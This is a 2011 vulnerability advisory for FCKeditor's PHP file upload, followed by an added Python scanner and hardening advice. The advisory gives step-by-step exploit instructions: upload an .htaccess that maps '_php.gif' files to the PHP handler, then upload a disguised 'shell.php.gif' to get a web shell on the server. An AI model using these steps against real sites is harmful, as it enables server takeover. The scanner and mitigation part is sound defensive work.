FCKeditor arbitrary file upload vulnerability (all PHP versions)
Author: anonymous | Source: compiled by this site | Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author: sinesafe.cn
[+] Website: WwW.sinesafe.cn
———————————————————
1. Create an .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now available from the server.
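The two artifacts this technique leaves behind are an attacker-supplied .htaccess in the upload tree and a renamed file that still carries "php" before its final extension. The following scanner, an added example that is not part of the original advisory, walks an upload directory and flags both; the directory layout and file names it builds are constructed for the demo.

```python
import os
import re
import tempfile

# Indicators a defender looks for in a web-upload tree (constructed for this example):
# 1. any .htaccess dropped into the upload directory
# 2. a handler directive inside it that maps some other extension to PHP
# 3. file names that still carry "php" before the final extension, e.g. shell_php.gif
HANDLER_RE = re.compile(r"^\s*(SetHandler|AddHandler|AddType)\b.*php",
                        re.IGNORECASE | re.MULTILINE)
# matches "shell_php.gif", "shell.php.gif", "x.php5.jpg" and a bare "x.php"
PHP_NAME_RE = re.compile(r"[._]php\d?(?:[._]|$)", re.IGNORECASE)


def scan_upload_dir(root):
    """Return sorted (finding, path) tuples for suspicious artifacts under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == ".htaccess":
                findings.append(("htaccess_in_uploads", path))
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if HANDLER_RE.search(fh.read()):
                        findings.append(("php_handler_override", path))
            elif PHP_NAME_RE.search(name):
                findings.append(("php_in_filename", path))
    return sorted(findings)


def demo():
    """Build a constructed upload tree with the artifacts the advisory describes and scan it."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write('<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n')
    for name in ("shell_php.gif", "photo.gif", "report.pdf"):
        open(os.path.join(root, name), "wb").close()
    return [finding for finding, _path in scan_upload_dir(root)]


if __name__ == "__main__":
    for finding, path in scan_upload_dir(tempfile.mkdtemp()) or []:
        print(finding, path)
    print(demo())
```

A scan like this is a detective control; the preventive fix is to serve the upload directory with AllowOverride None (so a dropped .htaccess is ignored) and with no PHP handler at all, and to reject upload names that contain a dot or underscore followed by "php" rather than merely rewriting the dot to an underscore.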